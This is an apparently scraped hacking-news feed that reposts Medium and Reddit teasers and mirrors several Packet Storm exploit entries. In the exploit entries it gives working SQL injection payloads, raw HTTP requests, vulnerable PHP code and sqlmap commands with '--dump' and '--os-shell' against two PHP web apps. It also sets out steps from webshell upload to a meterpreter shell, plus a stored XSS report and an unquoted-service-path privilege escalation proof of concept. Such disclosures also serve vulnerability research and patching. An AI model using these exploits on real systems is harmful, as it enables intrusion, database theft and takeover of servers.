Hacking on Medium
LET’S REMOVE RENSOMEWARE/TROJON/VIRUS FROM PC
https://cdn-images-1.medium.com/max/1920/1*tLk936SDX5yPSMhKrmCErg.png
What is Ransomware
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
LET’S REMOVE RENSOMEWARE/TROJON/VIRUS FROM PC
https://cdn-images-1.medium.com/max/1920/1*tLk936SDX5yPSMhKrmCErg.png
What is Ransomware
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
LET’S REMOVE RENSOMEWARE/TROJON/VIRUS FROM PC
What is Ransomware
Hacking on Medium
Hoy ¡Día mundial del backup!
https://cdn-images-1.medium.com/max/1080/1*sDH6j0zGK_2yOPDY0Bc8tw.png
El 31 de Marzo se celebra el día mundial de la copia de seguridad (backup) un día en el que se pretende recordar a los usuarios la…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Hoy ¡Día mundial del backup!
https://cdn-images-1.medium.com/max/1080/1*sDH6j0zGK_2yOPDY0Bc8tw.png
El 31 de Marzo se celebra el día mundial de la copia de seguridad (backup) un día en el que se pretende recordar a los usuarios la…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Hoy ¡Día mundial del backup!
El 31 de Marzo se celebra el día mundial de la copia de seguridad (backup) un día en el que se pretende recordar a los usuarios la…
Hacking on Medium
HomeGrown Red Team: Let’s Evade AV And Run Lazagne
https://cdn-images-1.medium.com/max/600/1*15LetPQLQe23S9gf8gJaVA.png
What is Lazagne?
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
HomeGrown Red Team: Let’s Evade AV And Run Lazagne
https://cdn-images-1.medium.com/max/600/1*15LetPQLQe23S9gf8gJaVA.png
What is Lazagne?
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
HomeGrown Red Team: Let’s Evade AV And Run Lazagne
What is Lazagne?
Hacking on Medium
CISA advierte sobre ataques cibernéticos continuos dirigidos a dispositivos UPS conectados a…
https://cdn-images-1.medium.com/max/1710/0*twEYG9ctqqKln-7M
PUBLICADO EN 31 MARZO, 2022POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
CISA advierte sobre ataques cibernéticos continuos dirigidos a dispositivos UPS conectados a…
https://cdn-images-1.medium.com/max/1710/0*twEYG9ctqqKln-7M
PUBLICADO EN 31 MARZO, 2022POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
CISA advierte sobre ataques cibernéticos continuos dirigidos a dispositivos UPS conectados a Internet
PUBLICADO EN 31 MARZO, 2022POR EHACKING
Hacking on Medium
80+ million Digilocker user’s phone numbers exposed [Fixed]
https://cdn-images-1.medium.com/max/651/1*xHb51JhWRynqBu_m5oHmLg.png
This is a story about my last finding at digilocker. In bug bounty we call these type issue as ‘low hanging fruits’. I already contribute…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
80+ million Digilocker user’s phone numbers exposed [Fixed]
https://cdn-images-1.medium.com/max/651/1*xHb51JhWRynqBu_m5oHmLg.png
This is a story about my last finding at digilocker. In bug bounty we call these type issue as ‘low hanging fruits’. I already contribute…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
80+ million Digilocker user’s phone numbers exposed [Fixed]
This is a story about my last finding at digilocker. In bug bounty we call these type issue as ‘low hanging fruits’. I already contribute…
Hacking on Medium
XSS Vulnerability Part 1
https://cdn-images-1.medium.com/max/1926/1*SXZiwzqwfSqhUACrfNNQ0g.png
Greetings, in this article I want to describe the XSS vulnerability in detail.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
XSS Vulnerability Part 1
https://cdn-images-1.medium.com/max/1926/1*SXZiwzqwfSqhUACrfNNQ0g.png
Greetings, in this article I want to describe the XSS vulnerability in detail.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
XSS Vulnerability Part 1
Greetings, in this article I want to describe the XSS vulnerability in detail.
Hacking on Medium
Ronin it Down: The Axie Hack
https://cdn-images-1.medium.com/max/2000/0*YGoEzyTkMSW040Ar.png
By Teddy MacDonald
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Ronin it Down: The Axie Hack
https://cdn-images-1.medium.com/max/2000/0*YGoEzyTkMSW040Ar.png
By Teddy MacDonald
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Ronin it Down: The Axie Hack
By Teddy MacDonald
Hacking on Medium
Do VPNs help my security?
https://cdn-images-1.medium.com/max/1280/1*mLWzLeQhRdb0CxKRvxwfIg.jpeg
Separating the marketing from security when it comes to VPN providers
Continue reading on Sentant »
___________________________
@hacking_Attack
@Hacking_Video
Do VPNs help my security?
https://cdn-images-1.medium.com/max/1280/1*mLWzLeQhRdb0CxKRvxwfIg.jpeg
Separating the marketing from security when it comes to VPN providers
Continue reading on Sentant »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Do VPNs help my security?
Separating the marketing from security when it comes to VPN providers
hacking: security in practice
Last one was fun so why not another? Preference?
Which do like the most?
View Poll
submitted by /u/STATERA_DIGITAL
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Last one was fun so why not another? Preference?
Which do like the most?
View Poll
submitted by /u/STATERA_DIGITAL
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Last one was fun so why not another? Preference?
Which do like the most?
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Message System 1.0 SQL Injection
https://2.bp.blogspot.com/-trS7d3JOSJY/WWlvYoSx4fI/AAAAAAAAIOo/ua-jTrS9avcHrliD3JJHs9ifWyf14eAUwCLcBGAs/s1600/h57.png
Message System version 1.0 suffers from a remote SQL injection vulnerability that can lead to remote code execution.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Message System 1.0 SQL Injection
https://2.bp.blogspot.com/-trS7d3JOSJY/WWlvYoSx4fI/AAAAAAAAIOo/ua-jTrS9avcHrliD3JJHs9ifWyf14eAUwCLcBGAs/s1600/h57.png
Message System version 1.0 suffers from a remote SQL injection vulnerability that can lead to remote code execution.
MD5 |
7ef4d3f7474471b42fd357a791baa911Download
# Title: Message System 1.0 1.0 Blind Time SQLi To Rce
# Author: Hejap Zairy
# Date: 30.07.2022
# Vendor: https://www.sourcecodester.com/php/15249/message-system-phpoop-free-source-code.html
# Software:https://www.sourcecodester.com/sites/default/files/download/oretnom23/pmms_1.zip
# Reference: https://github.com/Matrix07ksa
# Tested on: Windows, MySQL, Apache
# Steps
# 1.- Go to : https://0day.gov//pmms/?page=view_message&id=1
# 2 - manual inject Blind SQli Payload: https://0day.gov/pmms/?page=view_message&id=1' OR NOT 515=515#&password=hejap&button=Login
# 3 - SQLi To RCE r00t
# 4 - Ubload webshell
# 5 - Web Shell to meterpreter full tty shell
#vulnerability Code php
---
```
query("SELECT * FROM `conversation_list` where id = '{$_GET['id']}' and (`user_1` = '{$_settings->userdata('id')}' or `user_2` = '{$_settings->userdata('id')}') ");
if($qry->num_rows > 0){
foreach($qry->fetch_array() as $k => $v){
if(!is_numeric($k))
$$k = $v;
}
$msg = $conn->query("SELECT m.*,CONCAT(u.firstname,' ', COALESCE(u.middlename,''), ' ', u.lastname) as `name`, u.username, u.avatar FROM `message_list` m inner join users u on m.from_user = u.id where m.conversation_id = '{$id}' order by unix_timestamp(m.date_updated) asc limit 1 ")->fetch_array();
$conn->query("UPDATE `message_list` set `status` = 1 where conversation_id = '{$id}' and to_user = '{$_settings->userdata('id')}'");
}
else{
echo "";
}
?>
```
---
#Status: CRITICAL
[+] Payload GET
---
GET /pmms/?page=view_message&id=1 HTTP/1.1
Host: 0day.gov
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=fcmu4ss9vhq6760poojbtk40bt
Upgrade-Insecure-Requests: 1
---
```
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=view_message&id=1' AND (SELECT 4539 FROM (SELECT(SLEEP(5)))sFek) AND 'MXDw'='MXDw
---
```
#Blind SQLi Time to Rce
#ُExploit
sqlmap -r hejap_0day --dbs --time-sec=10 --tamper=space2comment --threads=5 -p id -D pmms_db -T users --dump --eta --technique=t --hex --os-shell
# Description:
The Blind Time SQLi vulnerability was converted to rce due to the permissions I have in the database and it was privesc
# Proof and Exploit:
https://i.imgur.com/HfDGPGT.png
https://i.imgur.com/6RH1Wvi.png
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Message System 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Message System 1.0 Cross Site Scripting
https://3.bp.blogspot.com/-PWecZP4mFlw/WWlvEzu2ALI/AAAAAAAAILE/oNE1-kA8UGAvJ1jZSurfN5UYJhXI-p6VQCLcBGAs/s1600/h134.png
Message System version 1.0 suffers from a persistent cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Message System 1.0 Cross Site Scripting
https://3.bp.blogspot.com/-PWecZP4mFlw/WWlvEzu2ALI/AAAAAAAAILE/oNE1-kA8UGAvJ1jZSurfN5UYJhXI-p6VQCLcBGAs/s1600/h134.png
Message System version 1.0 suffers from a persistent cross site scripting vulnerability.
MD5 |
f839897e9455f3d9113434ff6f7822cbDownload
## Title: Message System 1.0 1.0 XSS Stored
# Author: Hejap Zairy
# Date: 29.07.2022
# Vendor: https://www.sourcecodester.com/php/15249/message-system-phpoop-free-source-code.html
# Software:https://www.sourcecodester.com/sites/default/files/download/oretnom23/pmms_1.zip
# Reference: https://github.com/Matrix07ksa
# Tested on: Windows, MySQL, Apache
## Description:
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.
Status: CRITICAL
[+] Payloads:
```
https://0day.gov/pmms/?page=manage_message
> Subject
1
```
## Proof and Exploit:
https://i.imgur.com/ZcoLfS2.png
https://i.imgur.com/Fl68YTs.png
https://i.imgur.com/2GhIH1a.png
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Message System 1.0 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Medical Hub Directory Site 1.0 SQL Injection
https://1.bp.blogspot.com/-LuDwp3Oo6oc/WWlvICvnykI/AAAAAAAAILo/OetpmDNBdyImnh7DlH6SrwI0NyzSCKSJACLcBGAs/s1600/h142.png
Medical Hub Directory Site version 1.0 suffers from a remote blind SQL injection vulnerability. This research was submitted on the same day Packet Storm received similar findings from Saud Alenazi.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Medical Hub Directory Site 1.0 SQL Injection
https://1.bp.blogspot.com/-LuDwp3Oo6oc/WWlvICvnykI/AAAAAAAAILo/OetpmDNBdyImnh7DlH6SrwI0NyzSCKSJACLcBGAs/s1600/h142.png
Medical Hub Directory Site version 1.0 suffers from a remote blind SQL injection vulnerability. This research was submitted on the same day Packet Storm received similar findings from Saud Alenazi.
MD5 |
334b84b5707b15eaca45f92f7fbc24c8Download
# Title: Medical Hub Directory Site 1.0 Blind Time SQLi To Rce
# Author: Hejap Zairy
# Date: 30.07.2022
# Vendor: https://www.sourcecodester.com/php/15252/simple-medical-hub-directory-site-phpoop-source-code.html
# Software:https://www.sourcecodester.com/sites/default/files/download/oretnom23/mhds.zip
# Reference: https://github.com/Matrix07ksa
# Tested on: Windows, MySQL, Apache
# Steps
# 1.- Go to : https://0day.gov//mhds/admin/?page=category/manage_category&id=6
# 2 - manual inject Blind SQli Payload: https://0day.gov//mhds/admin/?page=category/manage_category&id=6 OR NOT 8425=8425#&password=hejap&button=Login
# 3 - SQLi To RCE r00t
# 4 - Ubload webshell
# 5 - Web Shell to meterpreter full tty shell
#vulnerability Code php
---
```
query("SELECT * FROM `category_list` where id = '{$_GET['id']}' and delete_flag = 0 ");
if($qry->num_rows > 0 ){
foreach($qry->fetch_array() as $k => $v){
if(!is_numeric($k))
$$k = $v;
}
}
}
?>
```
---
#Status: CRITICAL
[+] Payload GET
---
GET /mhds/admin/?page=category/manage_category&id=6 HTTP/1.1
Host: 0day.gov
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=ahm8bmdjtm25mldhc2rm7dc4f2
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
---
```
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=category/manage_category&id=6' AND (SELECT 8526 FROM (SELECT(SLEEP(5)))jfSR) AND 'KRZU'='KRZU
---
```
#Blind SQLi Time to Rce
#ُExploit
sqlmap -r hejap_0day --dbs --time-sec=10 --tamper=space2comment --threads=5 -p id -D mhds_db -T users --dump --eta --technique=t --hex --os-shell
# Description:
The Blind Time SQLi vulnerability was converted to rce due to the permissions I have in the database and it was privesc
# Proof and Exploit:
https://i.imgur.com/Siu2l0C.png
https://i.imgur.com/fU4As6a.png
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Medical Hub Directory Site 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Spoofer 1.4.6 Privilege Escalation / Unquoted Service Path
https://3.bp.blogspot.com/-sRAbWielMtM/WWlvVvmDA-I/AAAAAAAAIN8/PunzJUFKKskcHl_zTOrA6xP6ETTvhbejQCLcBGAs/s1600/h46.png
Spoofer version 1.4.6 suffers from an unquoted service path vulnerability that can lead to privilege escalation.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Spoofer 1.4.6 Privilege Escalation / Unquoted Service Path
https://3.bp.blogspot.com/-sRAbWielMtM/WWlvVvmDA-I/AAAAAAAAIN8/PunzJUFKKskcHl_zTOrA6xP6ETTvhbejQCLcBGAs/s1600/h46.png
Spoofer version 1.4.6 suffers from an unquoted service path vulnerability that can lead to privilege escalation.
MD5 |
519cd741e8a7025d315797603a548032Download
# Exploit Title: Spoofer 1.4.6 – Local Privilege Escalation via Unquoted Service Path
# Date: 24/01/2022
# Exploit Author: Asim Sattar (@M_Asim_1)
# Vendor Homepage: https://www.caida.org/projects/spoofer/
# Software Link: https://www.caida.org/projects/spoofer/downloads/Spoofer-1.4.6-win32.exe
# Version: 1.4.6
# Tested: Windows 10 (x64)
# CVE: CVE-2021-46443
Description:
-------------
Caida Spoofer 1.4.6 installs a service (spoofer-scheduler) with an unquoted
service path. Since this service is running as SYSTEM, this creates a local
privilege escalation vulnerability. To properly exploit this vulnerability,
a local attacker can insert an executable in the path of the service.
Rebooting the system or restarting the service will run the malicious
executable with elevated privileges.
------------------
Proof of Concept:
------------------
C:\Users\asim.sattar>wmic service get name,pathname,displayname,startmode |
findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
Spoofer Scheduler spoofer-scheduler C:\Program Files
(x86)\Spoofer\spoofer-scheduler.exe Auto
C:\Users\asim.sattar>sc qc "spoofer-scheduler"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: spoofer-scheduler
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files
(x86)\Spoofer\spoofer-scheduler.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Spoofer Scheduler
DEPENDENCIES : tcpip
SERVICE_START_NAME : LocalSystem
Regards,
Asim Sattar
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Spoofer 1.4.6 Privilege Escalation / Unquoted Service Path
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Chrome DeserializeFromMessage Validation Issue
https://3.bp.blogspot.com/-A9um4FlUYrw/WWlvH0fnNDI/AAAAAAAAILk/pA4dWsQKlcwBJHJ-2O0qL7e98i6zrXCWwCLcBGAs/s1600/h141.png
Chrome has an issue where a malformed message sent to DeserializeFromMessage may trigger deserialization of out-of-bounds data.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Chrome DeserializeFromMessage Validation Issue
https://3.bp.blogspot.com/-A9um4FlUYrw/WWlvH0fnNDI/AAAAAAAAILk/pA4dWsQKlcwBJHJ-2O0qL7e98i6zrXCWwCLcBGAs/s1600/h141.png
Chrome has an issue where a malformed message sent to DeserializeFromMessage may trigger deserialization of out-of-bounds data.
MD5 |
a56ea47a250ff2878dde318be1eb3a62Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Chrome DeserializeFromMessage Validation Issue
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.